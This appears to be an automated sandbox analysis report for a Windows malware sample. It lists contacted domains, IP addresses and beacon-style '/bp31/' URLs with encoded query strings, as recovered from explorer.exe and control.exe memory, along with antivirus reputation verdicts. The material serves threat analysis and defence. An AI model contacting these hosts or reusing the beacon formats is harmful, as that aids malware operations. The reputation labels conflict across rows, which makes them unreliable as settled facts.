          http://www.tqmsn.com/bp31/1%VirustotalBrowse
          http://www.adminonlinechecker.online0%VirustotalBrowse
          http://www.tqmsn.com0%Avira URL Cloudsafe
          http://www.biddrivego.comReferer:0%Avira URL Cloudsafe
          http://www.fnb.gay/bp31/100%Avira URL Cloudmalware
          http://www.millerstoehr.com0%Avira URL Cloudsafe
          http://www.fixerradvisory.com/bp31/100%Avira URL Cloudmalware
          http://www.alnawrasalrahhal.com/bp31/www.tqmsn.com0%Avira URL Cloudsafe
          http://www.fixerradvisory.com/bp31/www.millerstoehr.com100%Avira URL Cloudmalware
          http://www.bolfm.com/bp31/100%Avira URL Cloudmalware
          http://www.piabellacasino347.com0%Avira URL Cloudsafe
          http://www.tqmsn.comReferer:0%Avira URL Cloudsafe
          http://www.cascadefinnish.comReferer:0%Avira URL Cloudsafe
          http://www.millerstoehr.comReferer:0%Avira URL Cloudsafe
          http://www.darkpinefarm.com/bp31/100%Avira URL Cloudmalware
          http://www.alnawrasalrahhal.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV40%Avira URL Cloudsafe
          http://www.adminonlinechecker.onlineReferer:0%Avira URL Cloudsafe
          http://www.cascadefinnish.com0%Avira URL Cloudsafe
          http://www.videopromarket.com0%Avira URL Cloudsafe
          http://www.tqmsn.com/bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcp100%Avira URL Cloudmalware
          http://www.cascadefinnish.com/bp31/www.alnawrasalrahhal.com100%Avira URL Cloudmalware
          http://www.darkpinefarm.com0%Avira URL Cloudsafe
          http://www.biddrivego.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk100%Avira URL Cloudmalware
          http://www.cascadefinnish.com/bp31/100%Avira URL Cloudmalware
          http://tempuri.org/Database1DataSet.xsd0%Avira URL Cloudsafe
          http://www.fixerradvisory.com0%Avira URL Cloudsafe
          http://www.alnawrasalrahhal.com0%Avira URL Cloudsafe
          http://www.darkpinefarm.com/bp31/www.adminonlinechecker.online100%Avira URL Cloudmalware
          http://www.millerstoehr.com/bp31/100%Avira URL Cloudmalware
          http://www.alnawrasalrahhal.comReferer:0%Avira URL Cloudsafe
          www.piabellacasino347.com/bp31/100%Avira URL Cloudmalware
          http://www.videopromarket.com/bp31/www.turdfi.xyz0%Avira URL Cloudsafe
          http://www.adminonlinechecker.online/bp31/100%Avira URL Cloudmalware
          http://www.fnb.gay/bp31/www.fixerradvisory.com100%Avira URL Cloudmalware
          http://www.biddrivego.com/bp31/100%Avira URL Cloudmalware
          http://www.spitzpr-gq.info/bp31/www.piabellacasino347.com0%Avira URL Cloudsafe
          http://www.bolfm.com/bp31/www.videopromarket.com100%Avira URL Cloudmalware
          http://www.fnb.gay/&O0%Avira URL Cloudsafe
          http://www.bolfm.com0%Avira URL Cloudsafe
          http://www.piabellacasino347.com/bp31/www.darkpinefarm.com100%Avira URL Cloudmalware
          http://www.millerstoehr.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOv100%Avira URL Cloudmalware
          http://www.millerstoehr.com/bp31/www.bolfm.com100%Avira URL Cloudmalware
          http://www.gchzwf.comReferer:0%Avira URL Cloudsafe
          http://www.piabellacasino347.com/bp31/100%Avira URL Cloudmalware
          http://www.biddrivego.com/bp31/www.cascadefinnish.com100%Avira URL Cloudmalware
          http://www.spitzpr-gq.info0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.fnb.gay
          130.61.77.41
          truetrue
            unknown
            millerstoehr.com
            3.33.130.190
            truetrue
              unknown
              www.biddrivego.com
              103.224.212.216
              truetrueunknown
              cascadefinnish.com
              3.33.130.190
              truetrue
                unknown
                alnawrasalrahhal.com
                195.35.38.7
                truetrue
                  unknown
                  www.tqmsn.com
                  172.67.198.102
                  truetrueunknown
                  www.videopromarket.com
                  unknown
                  unknowntrue
                    unknown
                    www.millerstoehr.com
                    unknown
                    unknowntrueunknown
                    www.cascadefinnish.com
                    unknown
                    unknowntrueunknown
                    www.bolfm.com
                    unknown
                    unknowntrueunknown
                    www.odisexport.com
                    unknown
                    unknowntrue
                      unknown
                      www.fixerradvisory.com
                      unknown
                      unknowntrueunknown
                      www.alnawrasalrahhal.com
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://www.cascadefinnish.com/bp31/?yzuD_Vc=ieodBXaeqV8oce4b5CZNIl9GV0f6ZOMGR+lwHtCXy9ziWDHkC3UxRT7a3Y07V5Vcpr7g&wdR=K48xltk0G0VLCVcptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.alnawrasalrahhal.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4true
                        • Avira URL Cloud: safe
                        unknown
                        http://www.tqmsn.com/bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.biddrivego.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbktrue
                        • Avira URL Cloud: malware
                        unknown
                        www.piabellacasino347.com/bp31/true
                        • Avira URL Cloud: malware
                        low
                        http://www.millerstoehr.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=DnQ2mpp/p9SrOrTdvvrBBnHCHwlyRJxHHfFV5U6skaUaBlNFsDA0N9XRwg9RyRq/LEOvtrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.biddrivego.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.piabellacasino347.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://word.office.comonexplorer.exe, 00000004.00000002.4540698292.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fnb.gayexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.turdfi.xyzexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmptrue
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        http://www.adminonlinechecker.online/bp31/www.gchzwf.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.videopromarket.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.gchzwf.com/bp31/explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmptrue
                        • 2%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://powerpoint.office.comcemberexplorer.exe, 00000004.00000002.4544685051.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2081190838.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fnb.gay/control.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fnb.gayReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.spitzpr-gq.infoReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.videopromarket.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://excel.office.comexplorer.exe, 00000004.00000003.3842161318.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4541836056.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3094161101.0000000009BB2000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://schemas.microexplorer.exe, 00000004.00000002.4540163883.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4540212535.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4539524842.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.spitzpr-gq.info/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.turdfi.xyzReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.bolfm.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fnb.gay/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=UJqh63c9yiVXKVsa3boGAX6IISqW51ijhAAZGwRUcontrol.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532013045.000000000310A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.tqmsn.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 1%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.fixerradvisory.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.turdfi.xyz/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: phishing
                          unknown
                          http://www.alnawrasalrahhal.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.adminonlinechecker.onlineexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.gchzwf.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.turdfi.xyz/bp31/www.biddrivego.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          http://www.darkpinefarm.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tqmsn.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.biddrivego.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fnb.gay/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532013045.0000000003112000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.millerstoehr.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fixerradvisory.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000004.00000000.2081190838.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4544685051.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://www.alnawrasalrahhal.com/bp31/www.tqmsn.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fixerradvisory.com/bp31/www.millerstoehr.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://www.bolfm.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://www.piabellacasino347.comexplorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tqmsn.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUgHXEfw1uL.exe, 00000000.00000002.2071512446.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.cascadefinnish.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.millerstoehr.comReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.darkpinefarm.com/bp31/explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://wns.windows.com/)sexplorer.exe, 00000004.00000002.4540698292.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2078672674.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                http://www.adminonlinechecker.onlineReferer:explorer.exe, 00000004.00000003.3095091139.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841329710.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3841991680.000000000C8CE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4546504737.000000000C8BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095875819.000000000C8CE000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
